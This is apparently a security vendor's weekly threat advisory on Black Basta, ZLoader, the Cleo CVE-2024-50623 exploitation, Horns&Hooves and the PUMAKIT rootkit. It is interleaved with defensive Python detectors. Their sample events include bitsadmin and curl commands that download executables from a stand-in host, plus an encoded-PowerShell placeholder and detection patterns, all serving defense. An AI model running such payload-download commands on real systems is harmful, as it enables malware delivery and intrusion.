Black Basta Ransomware Adopts Sophisticated Social Engineering Tactics
- SISA Weekly Threat Watch -
In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the discovery of the advanced PUMAKIT Linux rootkit, which uses stealth techniques, privilege escalation, and syscall hooking to evade detection and maintain persistence on targeted systems. Researchers have also reported the resurgence of ZLoader malware with version 2.9.4.0, featuring DNS tunneling for encrypted C2 communications. Another critical development is the active exploitation of a vulnerability (CVE-2024-50623) in Cleo’s managed file transfer software, allowing unauthenticated remote code execution to deploy ransomware like Termite. Meanwhile, the Horns&Hooves malware campaign continues to target users in Russia with malicious JavaScript files delivered via phishing emails, deploying NetSupport RAT for remote control and facilitating further malware infections. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.
SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.
1. Malware Uses JavaScript and ZIP Attachments to Deploy NetSupport RAT
The Horns&Hooves malware campaign, active since March 2023, has been targeting private users, retailers, and businesses in Russia through sophisticated phishing emails. These emails contain ZIP attachments with malicious JavaScript files that mimic legitimate business correspondence to deploy NetSupport RAT and BurnsRAT, enabling remote system control and command execution. Researchers have observed advanced obfuscation techniques, such as disguising malicious scripts as legitimate software, allowing the malware to evade detection effectively. The infection chain often leads to the installation of additional stealers like Rhadamanthys and Meduza, increasing the risk of data theft and ransomware attacks.
To mitigate this threat, organizations should train employees to identify phishing emails and block suspicious ZIP attachments. Deploying robust antivirus tools is essential to detect unauthorized activities, such as the use of BITSAdmin or curl for downloading malicious payloads. Network monitoring should focus on restricting outbound traffic to untrusted domains and identifying suspicious C2 communication. In the event of compromise, systems should be isolated promptly, and endpoint analysis should be performed to prevent further damage.
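The advisory's suggestion to watch for BITSAdmin or curl pulling payloads can be turned into a concrete detection. The following Python is an added example (not SISA's code and not tied to any vendor schema): it takes process-creation events shaped as constructed (parent image, image, command line) tuples, keeps only the built-in download utilities, and raises a finding only when the command line both carries a URL and uses a flag that writes the fetched content to disk; a script-host parent such as wscript.exe, the typical launcher for a JavaScript attachment, raises the severity. The 203.0.113.0/24 addresses are documentation space, not real infrastructure.

```python
"""Flag built-in download utilities fetching remote payloads to disk.
Added example; events are constructed Sysmon-like tuples, not a vendor format."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample events: (parent image, image, command line).
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    (r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer upd /download /priority high http://203.0.113.10/upd.exe C:\Users\Public\upd.exe"),
    (r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
     r"curl -o C:\Users\Public\payload.exe http://203.0.113.10/payload.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\curl.exe",
     r"curl https://example.org/"),          # fetch to stdout, nothing written to disk
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /list"),                     # no URL at all
]

DOWNLOAD_TOOLS = {"bitsadmin.exe", "curl.exe", "certutil.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Flags that make each tool write the fetched content to disk (heuristic).
WRITE_TO_DISK = {
    "bitsadmin.exe": re.compile(r"/transfer\b", re.IGNORECASE),
    "curl.exe": re.compile(r"(^|\s)(-o|-O|--output|--remote-name)(\s|$)"),
    "certutil.exe": re.compile(r"-urlcache\b", re.IGNORECASE),
}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    tool: str
    url: str
    parent: str
    severity: str


def classify(parent_image: str, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when a download tool writes a remote resource to disk."""
    tool = basename(image)
    if tool not in DOWNLOAD_TOOLS:
        return None
    urls = URL_RE.findall(cmdline)
    if not urls or not WRITE_TO_DISK[tool].search(cmdline):
        return None
    parent = basename(parent_image)
    severity = "high" if parent in SCRIPT_HOSTS else "medium"
    return Finding(tool=tool, url=urls[0], parent=parent, severity=severity)


def scan(events) -> List[Finding]:
    """Classify every event and keep the findings."""
    return [f for f in (classify(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Of the four constructed events only the two launched from wscript.exe produce findings; plain `curl URL` to stdout and `bitsadmin /list` are ignored, which keeps the rule quiet on routine administrative use.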
2. Black Basta Ransomware Adopts Sophisticated Social Engineering Tactics
The Black Basta ransomware group has evolved its tactics, incorporating advanced social engineering techniques such as email bombing and impersonating IT personnel to manipulate users into installing legitimate remote access tools like AnyDesk, TeamViewer, or Quick Assist. In some cases, attackers initiate communication via Microsoft Teams, presenting themselves as trusted IT staff. Once access is granted, the group deploys malware such as Zbot (ZLoader), DarkGate, and custom tools to harvest credentials, enumerate environments, and bypass MFA protections for deeper infiltration. Emerging in 2022 from the remnants of Conti, Black Basta has adopted a hybrid malware dissemination model, combining botnets with social engineering strategies to expand its reach.
The group’s tactics extend to using tools like the OpenSSH client for reverse shells and distributing malicious QR codes to steal credentials or redirect victims to compromised infrastructure. Leveraging bespoke malware such as KNOTWRAP, KNOTROCK, and DAWNCRY, along with utilities like PORTYARD and COGSCAN, Black Basta has demonstrated an ability to exploit trusted channels and tools for sophisticated attacks. Organizations must mitigate these threats by implementing robust spam filters, restricting unauthorized remote access tools, enforcing MFA, monitoring for anomalous activities, and educating employees to recognize social engineering techniques, such as impersonation or QR code phishing. Effective vulnerability management, network traffic monitoring, and strict access controls remain critical to minimizing the risk of compromise.
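Email bombing, the opening move described above, leaves a measurable trace before anyone from "IT" makes contact: one mailbox suddenly receives far more messages, from far more distinct senders, than its normal baseline. The Python below is an added example, not SISA's code; it assumes a constructed one-line-per-delivery log format and treats the ten-minute window and the 20-message threshold as tuning values to adjust per environment.

```python
"""Sliding-window detector for e-mail bombing: one mailbox receiving many
messages from many distinct senders in a short span. Added example; the log
format is constructed and the thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

WINDOW = timedelta(minutes=10)   # assumed window length
THRESHOLD = 20                   # assumed messages per mailbox per window


def parse_line(line: str) -> Tuple[datetime, str, str]:
    """Constructed format: '<ISO timestamp> to=<rcpt> from=<sender>'."""
    ts, to_part, from_part = line.split(" ")
    return (datetime.fromisoformat(ts),
            to_part[len("to=<"):-1],
            from_part[len("from=<"):-1])


def detect_bursts(lines, window=WINDOW, threshold=THRESHOLD) -> Dict[str, dict]:
    """Return, per mailbox that crossed the threshold, its busiest window."""
    per_rcpt = defaultdict(list)
    for line in lines:
        ts, rcpt, sender = parse_line(line)
        per_rcpt[rcpt].append((ts, sender))
    alerts: Dict[str, dict] = {}
    for rcpt, msgs in per_rcpt.items():
        msgs.sort()
        start = 0
        for end in range(len(msgs)):
            # Slide the window start forward until it spans at most `window`.
            while msgs[end][0] - msgs[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(rcpt, {}).get("count", 0):
                alerts[rcpt] = {
                    "count": count,
                    "distinct_senders": len({s for _, s in msgs[start:end + 1]}),
                    "window_start": msgs[start][0].isoformat(),
                }
    return alerts


def build_sample() -> List[str]:
    """Constructed log: one bombed mailbox and one with normal traffic."""
    base = datetime(2024, 12, 10, 9, 0, 0)
    lines = []
    for i in range(30):   # 30 messages in under 5 minutes from 30 different lists
        ts = (base + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{ts} to=<victim@corp.example> from=<list{i}@newsletters.example>")
    for i in range(5):    # normal traffic: one message every 12 minutes
        ts = (base + timedelta(minutes=12 * i)).isoformat()
        lines.append(f"{ts} to=<colleague@corp.example> from=<partner@vendor.example>")
    return lines


if __name__ == "__main__":
    for mailbox, info in detect_bursts(build_sample()).items():
        print(mailbox, info)
```

The high distinct-sender count is what separates a bombing run (many newsletter sign-ups at once) from a single noisy but legitimate sender; an alert on the mailbox is also a useful cue to warn that user that an unsolicited "IT support" call or Teams message may follow.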
3. CVE-2024-50623: Critical Vulnerability in Cleo Software Exploited for Mass RCE
A critical vulnerability (CVE-2024-50623) in Cleo’s managed file transfer solutions—Harmony, VLTrader, and LexiCom—has been actively exploited since December 3, 2024, allowing unauthenticated remote code execution. The flaw arises from an unrestricted file upload mechanism, enabling attackers to drop malicious files into the “autorun” directory. This triggers embedded PowerShell commands, which retrieve further malware like Java Archive (JAR) files from remote servers. Notably, attackers have leveraged this vulnerability to deploy Termite ransomware, a modified variant of Babuk ransomware, encrypting files with a .termite extension.
The exploitation surged on December 8, 2024, targeting industries such as consumer goods, logistics, and food supply. Security researchers confirmed that exposed Cleo servers, discoverable through Shodan, were key entry points. Despite advisories and partial patches issued by Cleo, the vulnerability remains under active exploitation. Immediate mitigations include restricting the internet exposure of Cleo servers, monitoring critical directories for unauthorized uploads, and isolating Cleo systems from sensitive networks. Organizations must also deploy EDR tools to detect suspicious PowerShell activity, maintain offline backups for quick recovery, and promptly apply patches to prevent further ransomware attacks.
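Because the attack path runs through files appearing in the autorun directory, "monitoring critical directories for unauthorized uploads" can be a simple baseline-and-diff check. The Python below is an added example, not Cleo's or SISA's code: it hashes every file under a directory, diffs two snapshots, and scans any newly added file for content markers (PowerShell invocations, encoded-command flags, URLs) that have no place in a scheduled job definition. The temporary directory and the file contents are constructed stand-ins; in practice the snapshot would be pointed at the product's real autorun path.

```python
"""Baseline-and-diff monitor for a file-transfer server's autorun directory.
Added example; the directory and files are constructed stand-ins."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

# Content markers that should not appear in a legitimate autorun job file (heuristic).
SUSPICIOUS_TOKENS = (b"powershell", b"-enc", b"cmd.exe", b"http://", b"https://")


def snapshot(directory) -> Dict[str, str]:
    """Map relative path -> SHA-256 for every regular file under directory."""
    root = Path(directory)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff(old: Dict[str, str], new: Dict[str, str]) -> Dict[str, List[str]]:
    """Added, removed and content-changed paths between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def inspect_files(directory, names) -> Dict[str, List[str]]:
    """Return the suspicious tokens found in each named file (case-insensitive)."""
    root = Path(directory)
    out: Dict[str, List[str]] = {}
    for name in names:
        data = (root / name).read_bytes().lower()
        out[name] = [t.decode() for t in SUSPICIOUS_TOKENS if t in data]
    return out


def demo():
    """Take a baseline, drop a constructed file, report what changed and why it matters."""
    with tempfile.TemporaryDirectory() as d:
        autorun = Path(d) / "autorun"
        autorun.mkdir()
        (autorun / "nightly.job").write_text("schedule=02:00\naction=archive\n")
        baseline = snapshot(autorun)
        # Constructed stand-in for an unexpected upload; plain text, nothing runs.
        (autorun / "staged.txt").write_text("run: powershell -enc <base64 placeholder>\n")
        changes = diff(baseline, snapshot(autorun))
        return changes, inspect_files(autorun, changes["added"])


if __name__ == "__main__":
    changes, findings = demo()
    print(changes)
    print(findings)
```

Run on a schedule (or from an inotify-style watcher), the "added" and "modified" lists feed an alert, and the token scan gives the responder an immediate reason to pull the file for analysis rather than waiting for the resulting PowerShell process to be noticed.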
4. ZLoader Evolves with Stealthy DNS Tunneling for Command Control
The ZLoader malware has resurfaced with version 2.9.4.0, introducing advanced capabilities such as a DNS tunneling protocol for encrypted command-and-control (C2) communication and an interactive shell for executing binaries, DLLs, and shellcode. Originally based on the Zeus banking trojan, ZLoader has evolved with sophisticated anti-analysis techniques, including environment checks, API import resolution, and a Domain Generation Algorithm (DGA) to ensure resilience against detection. These advancements allow it to bypass traditional security systems effectively while supporting data exfiltration and process termination.
ZLoader’s resurgence has been linked to Black Basta ransomware attacks, where multi-stage infection chains leverage Remote Monitoring and Management (RMM) tools like AnyDesk, TeamViewer, and Microsoft Quick Assist. Small-scale, targeted campaigns, often enabled by initial access brokers, highlight its shift from widespread attacks to precision-based operations.
To counter this threat, organizations must monitor DNS traffic for tunneling anomalies and enforce strict controls on RMM tool usage, paired with multifactor authentication. Proactive endpoint hardening, user awareness training to identify phishing and impersonation tactics, and robust incident response plans are critical. Additionally, security tools must be updated regularly to detect ZLoader’s anti-analysis techniques, while network segmentation can contain lateral movement and limit malware spread.
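"Monitor DNS traffic for tunneling anomalies" is easier said than done, so here is what the anomalies look like in practice. The Python below is an added example, not SISA's code and not a description of ZLoader's actual wire format: it aggregates resolver queries per registered domain and scores each on the traits a tunnel cannot hide, namely a high ratio of never-repeated subdomains, long labels, high character entropy in those labels, and a skew toward record types that carry arbitrary payload (TXT, NULL). The query set, the two-label suffix rule and the thresholds are all constructed assumptions.

```python
"""Per-domain DNS tunneling heuristics over a list of (query name, record type).
Added example with constructed queries; thresholds are tuning assumptions."""
import math
from collections import defaultdict
from typing import Dict, List, Tuple


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def registered_domain(qname: str) -> Tuple[str, List[str]]:
    """Split into (registered domain, subdomain labels).
    Assumes a two-label public suffix; real code would use a suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_domains(queries, min_queries: int = 20) -> Dict[str, dict]:
    """Aggregate per registered domain and flag tunnel-like behaviour."""
    stats = defaultdict(lambda: {"count": 0, "subs": set(), "len": 0, "ent": 0.0, "txt": 0})
    for qname, qtype in queries:
        dom, sub_labels = registered_domain(qname)
        sub = ".".join(sub_labels)
        s = stats[dom]
        s["count"] += 1
        s["subs"].add(sub)
        s["len"] += len(sub)
        s["ent"] += entropy(sub.replace(".", ""))
        if qtype in ("TXT", "NULL"):
            s["txt"] += 1
    out: Dict[str, dict] = {}
    for dom, s in stats.items():
        n = s["count"]
        if n < min_queries:          # too little data to judge
            continue
        unique_ratio = len(s["subs"]) / n
        avg_len = s["len"] / n
        avg_ent = s["ent"] / n
        indicators = []
        if unique_ratio > 0.8:
            indicators.append("high_unique_subdomain_ratio")
        if avg_len > 40:
            indicators.append("long_subdomains")
        if avg_ent > 3.5:
            indicators.append("high_entropy")
        if s["txt"] / n > 0.5:
            indicators.append("txt_heavy")
        out[dom] = {"queries": n, "unique_ratio": round(unique_ratio, 2),
                    "avg_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
                    "indicators": indicators, "suspicious": len(indicators) >= 2}
    return out


def sample_queries() -> List[Tuple[str, str]]:
    """Constructed traffic: 50 tunnel-like TXT queries and 30 ordinary A queries."""
    base = "0123456789abcdef" * 3
    q = []
    for i in range(50):
        # Unique 50-character label with a near-uniform character distribution.
        q.append((f"{i:02x}{base}.tunnel.example", "TXT"))
    for i in range(30):
        q.append((("www", "static", "img")[i % 3] + ".cdn.example", "A"))
    return q


if __name__ == "__main__":
    for dom, info in score_domains(sample_queries()).items():
        print(dom, info)
```

Requiring two indicators before flagging keeps CDNs and cloud services, which also produce many unique subdomains but with short, low-entropy labels and ordinary A/AAAA lookups, below the alert line; the per-domain view is also the natural place to add an allowlist for known DNS-heavy services once a baseline is established.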
5. Advanced Linux Rootkit Leveraging Stealth and Privilege Escalation Techniques
PUMAKIT is a newly identified Linux rootkit that employs advanced stealth techniques, privilege escalation, and syscall hooking to evade detection and maintain persistence on targeted systems. PUMAKIT operates as a Loadable Kernel Module (LKM) rootkit, leveraging Linux’s internal function tracer (ftrace) to intercept and manipulate system functions such as prepare_creds and commit_creds. This sophisticated malware features a multi-stage infection chain involving a dropper, two memory-resident executables (memfd:tgt and memfd:wpn), and the LKM rootkit (puma.ko), alongside a shared object userland rootkit named Kitsune.
The dropper uses an unmodified Cron binary to load subsequent malware stages, while the rootkit hooks into 18 system calls, including abusing the rmdir() syscall for privilege escalation. PUMAKIT activates only under specific conditions, such as secure boot checks or kernel symbol availability, ensuring stealth and precision. By using memory-resident files and advanced syscall manipulation, the malware maintains persistence and evades detection by traditional monitoring tools.
To mitigate the risk, organizations should harden kernels with strict module loading policies, enable secure boot, and deploy tools like Auditd to monitor syscall usage for anomalies. File integrity monitoring solutions should be implemented to detect unauthorized changes, while runtime memory protection can block memory-resident malware. Regular updates, network segmentation, and minimal privilege enforcement further reduce exposure. Lastly, robust incident response plans and behavioral analysis tools are essential for detecting and responding swiftly to rootkit infections.
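The advice to monitor syscall usage with Auditd maps directly onto the traits described above: a memory-resident executable (the memfd: stages), rmdir() calls from an unexpected origin, and a kernel module being loaded. The Python below is an added example, not SISA's or any vendor's tooling: it parses audit SYSCALL records and raises one alert per matching trait. The audit log lines are constructed, the rule set in the header comment is the assumption under which such records would be produced (standard auditctl syntax), and the syscall numbers are the x86_64 values (84 rmdir, 175 init_module, 313 finit_module); other architectures need their own table.

```python
"""Parse Linux audit SYSCALL records and flag rootkit-like traits.
Added example; the audit lines below are constructed, and the rules that
would produce them (an assumption) are:
    -a always,exit -F arch=b64 -S rmdir -k rmdir_watch
    -a always,exit -F arch=b64 -S init_module,finit_module -k modules
"""
import re
from typing import Dict, List, Tuple

# x86_64 syscall numbers; records with any other arch are not mapped.
SYSCALL_NAMES_X86_64 = {"84": "rmdir", "175": "init_module", "313": "finit_module"}
X86_64_ARCH = "c000003e"
UNTRUSTED_PREFIXES = ("/memfd:", "/tmp/", "/dev/shm/", "/var/tmp/")

# key=value pairs; quoted values may contain spaces, e.g. exe="/memfd:wpn (deleted)".
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Constructed records: a memfd-backed process calling rmdir, a normal rm,
# a module load, and an ordinary execve with its PROCTITLE companion.
SAMPLE_RECORDS = [
    'type=SYSCALL msg=audit(1702400000.101:7001): arch=c000003e syscall=84 success=yes exit=0 '
    'ppid=1 pid=4242 auid=1000 uid=1000 gid=1000 euid=1000 comm="wpn" '
    'exe="/memfd:wpn (deleted)" key="rmdir_watch"',
    'type=SYSCALL msg=audit(1702400000.102:7002): arch=c000003e syscall=84 success=yes exit=0 '
    'ppid=3100 pid=3101 auid=1000 uid=1000 gid=1000 euid=1000 comm="rm" '
    'exe="/usr/bin/rm" key="rmdir_watch"',
    'type=SYSCALL msg=audit(1702400000.103:7003): arch=c000003e syscall=313 success=yes exit=0 '
    'ppid=4242 pid=4250 auid=1000 uid=0 gid=0 euid=0 comm="insmod" '
    'exe="/usr/sbin/insmod" key="modules"',
    'type=SYSCALL msg=audit(1702400000.104:7004): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=2000 pid=2001 auid=1000 uid=1000 gid=1000 euid=1000 comm="ls" '
    'exe="/usr/bin/ls" key=(null)',
    'type=PROCTITLE msg=audit(1702400000.104:7004): proctitle="ls -la"',
]


def parse_record(line: str) -> Dict[str, str]:
    """Turn one audit line into a field dict, stripping quotes from quoted values."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def analyze(lines) -> List[Tuple[str, str, str]]:
    """Return (pid, reason, detail) alerts for rootkit-like SYSCALL records."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") != "SYSCALL":
            continue
        exe = rec.get("exe", "")
        pid = rec.get("pid", "?")
        name = None
        if rec.get("arch") == X86_64_ARCH:
            name = SYSCALL_NAMES_X86_64.get(rec.get("syscall", ""))
        if exe.startswith("/memfd:"):
            alerts.append((pid, "memory_resident_executable", exe))
        if name == "rmdir" and exe.startswith(UNTRUSTED_PREFIXES):
            alerts.append((pid, "rmdir_from_untrusted_location", exe))
        if name in ("init_module", "finit_module"):
            alerts.append((pid, "kernel_module_load", f"auid={rec.get('auid')} exe={exe}"))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_RECORDS):
        print(alert)
```

A plain `rm -r` from /usr/bin produces no alert, so the rmdir rule stays quiet on day-to-day use; every module load is reported because on a hardened host with strict loading policies it should be rare enough to review individually, and the auid field ties it back to the logged-in user rather than the (possibly escalated) uid.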
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.